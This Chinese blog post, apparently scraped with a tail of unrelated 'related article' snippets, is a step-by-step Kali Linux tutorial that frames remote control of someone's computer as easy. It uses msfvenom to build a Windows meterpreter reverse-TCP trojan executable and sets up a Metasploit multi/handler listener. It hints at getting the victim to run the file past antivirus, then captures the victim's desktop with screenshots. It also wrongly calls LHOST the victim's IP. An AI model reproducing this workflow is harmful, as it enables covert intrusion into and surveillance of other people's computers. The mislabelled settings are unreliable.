最近某安全厂商很火,很多离职员工都是被这套系统抓出来的。其实原理很简单,本文就用很多人都用过的kali系统,告诉你,想要控制你的电脑有多简单!

网上的文章很多,如这篇,Kali攻防,写的不错,但是其中的步骤个人感觉还是有些乱,而且kali的版本也不同,所以还是自己整理一下。文中会涉及一些基本概念,请大家自己脑补。

1、生成木马

以前看其他文章没有写仔细,先启动了msfconsole,结果采用如下语句一直无法生成木马,后来发现是步骤错了,不能先启动msfconsole,直接在kali的命令行里输入以下语句即可:

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp -e LHOST=10.0.2.15 LPORT=4444 -f exe > testhack.exe

成功执行后,会在root文件夹下生成一个exe文件,留好了备用。记者这里的LHOST是用本地IP。

需要提醒的是:

很多文章中payload都用的是windows/x64/meterpreter/reverse_tcp,但我的kali版本中是windows/x64/meterpreter_reverse_tcp,这一点请注意,可以用show payloads看看你的系统是不是跟我一样?

2、执行msfconsole

上面讲了,第二步才是执行msfconsole,执行完毕以后,每次都会有不同动物的图案出现,很好玩!

3、使用handler模块

需要说明的是,我这里是msf5提示符,不是其他文章中介绍的msf

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > 

4、查看handler参数(可选)

msf5 exploit(multi/handler) > show options

出现上述截图,说明是成功的

5、shellcode设置

msf5 exploit(multi/handler) >  set payload windows/x64/meterpreter_reverse_tcppayload => windows/x64/meterpreter_reverse_tcpmsf5 exploit(multi/handler) > show options

6、修改LHOST和LPORT端口

在执行以下配置之前,首先保证受攻击方的电脑是正常开启的,否则后面的步骤不会成功。最好是把后面第7步的上传并在受攻击机器上执行exe文件也执行了,保证后面一步成功!

msf5 exploit(multi/handler) > set LHOST 10.0.2.18
LHOST => 10.0.2.18
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > show options

与第4步的图是不同的,说明配置参数成功。这里的LHOST就是被攻击端的IP,不要搞错了。

7、执行exploit命令

msf5 exploit(multi/handler) > exploit

到这一步,就剩下让刚才制定的10.0.2.18去执行第一步生成的exe文件了,由于这个文件肯定会被杀毒软件封杀,所以上传到10.0.2.18的时候,需要各显神通了。出现上述截图,说明攻击成功了!

8、验证

metepreter > screenshot

那么就会把 10.0.2.18的桌面截图存放在攻击电脑上,市面上那些可以监控你屏幕的软件,基本都是基于这套东西做出来的。

【时间之外】监控你的电脑只需8步相关推荐

  1. win10开机未能正确启动_设置华硕电脑定时开机只需两步!

    目前ASUS大部分台式机和一体机都支持定时开机功能. 只需两步即可实现 1.开机按[F2]或者[DEL]键进入BIOS,依次进入[Advanced][APM],将[ERP]设置为[Disabled], ...

  2. 计算机内存4g如何,电脑内存4G升到8G,只需三步,让你轻松搞定笔记本内存升级...

    今日看点:电脑内存4G升到8G,只需三步,让你轻松搞定笔记本内存升级 大家好,这期小编给大家讲讲怎么给笔记本升级电脑内存,小编现在用的是朋友的笔记本,小编发现朋友的笔记本的内存只有4GB.小编每次用p ...

  3. 电脑运行时经常卡顿,只需三步就可以解决这个问题

    电脑运行时经常卡顿,只需三步就可以解决这个问题! 2018-08-19 18:40 来源:97视角 计算机作为互联网时代不可或缺的产物,很多人在使用它的时候都会出现各种各样的问题,例如打开某个软件或者 ...

  4. 计算机卡顿cmd,电脑运行时经常卡顿?只需3步操作,就跟新买的一样流畅!

    原标题:电脑运行时经常卡顿?只需3步操作,就跟新买的一样流畅! 很多时候我们遇到电脑卡顿时就会烦躁,吐槽着电脑真垃圾!而很多用户的做法无不在乎就是重装系统,其实不然,解决电脑卡顿的方法除此之外有的是好 ...

  5. 只需两步快速获取微信小程序源码

    第一次在掘金这样高大上的社区写文章,忐忑地敲下我获取小程序源码过程中的经验分享. 最近在学习微信小程序开发,半个月学习下来,很想实战一下踩踩坑,于是就仿写了某个小程序的前端实现,过程一言难尽,差不多两 ...

  6. 只需两步获取任何小程序源码

    这种方法,并不能反编译出所有的小程序源码,请自知! 具体的局限请看:qwerty472123大神的md文件 https://github.com/qwerty472123/wxappUnpacker ...

  7. 阿里云asp主机 后台登录一直提示验证码错误_Lazada官方最全开店指南首发!云开店之入驻篇,快速入驻只需四步...

    近期后台收到了许多商家朋友关于如何入驻.运营Lazada店铺的问题咨询,平台特此针对Lazada入驻流程做了全面升级优化,同时整理出一套完整的新商家入驻解决方案 -- 极速云开店.作为"春风 ...

  8. 只需两步获取任何微信小程序源码

    只需两步获取任何微信小程序源码 kedwan关注 12018.09.15 09:32:43字数 2,428阅读 3,946 转载自百家号作者:不忘初心lucy 第一次在掘金这样高大上的社区写文章,忐忑 ...

  9. AI帮你写Python,安装只需5步,还能任你调教 | 开源

    鱼羊 发自 凹非寺  量子位 报道 | 公众号 QbitAI 一行一行地敲代码就像是徒手搬砖,聪明的程序猿们表示:我们要解放生产力! 比如像这样: 在机器学习的时代,AI智能补全代码早已不是梦想,各种 ...

最新文章

  1. 【虚拟机】苹果虚拟机mac10.11.6+Xcode8.1
  2. https ddos检测——研究现状
  3. 数据库字段设置为非空默认值
  4. sql 中使用 where 1=1 和 where 1=0的作用
  5. 删除c++程序中的注释
  6. php队列失败是指什么,队列是什么意思
  7. 医生们团结一致,以增加对优质健康信息的访问
  8. gd动态曲线 php_PHP 高级编程之多线程
  9. mysql rs.next_JDBC结果集rs.next()注意事项
  10. oracle24550,ORA-24550: signal received:这个问题的原因及解决办法
  11. 找到dht网络的节点了
  12. lombok几个基本注解的使用@Data @AllArgsConstructor @NoArgsConstructor @Builder
  13. 利用anaconda给pycharm配置python3.7版本的tensorflow虚拟环境的配置
  14. 使用Macsome Audiobook Converter for Mac转换有声读物?
  15. Mac电脑上如何备份Instagram帐户?一款软件轻松帮你搞定
  16. 智能优化算法:堆优化算法-附代码
  17. 嵌入式算法19---国家商用密码SM算法
  18. 添加打印机无法搜索计算机,添加打印机搜索不到打印机怎么办
  19. mqtt协议 阿里云物联网平台
  20. SAS学习步骤和参考书

热门文章

  1. 王者荣耀java_王者荣耀版Java教程第四期:数组来了
  2. linux 下Qt 如何修改系统时间
  3. word格式刷如何连续刷多段不同字段?
  4. 分享 朋友圈 微博 QQ空间
  5. 南通数字孪生智能工厂可视化,3d可视化工业建模,数字工厂智能车间建设
  6. 【vim】vim命令|工具
  7. 猎豹MFC--画椭圆圆弧饼图多边形及其他形状
  8. 云盘满足校园存储与数据共享
  9. 美女和男人的游戏 博弈论
  10. 利用百度AI,图片转文字的简单实现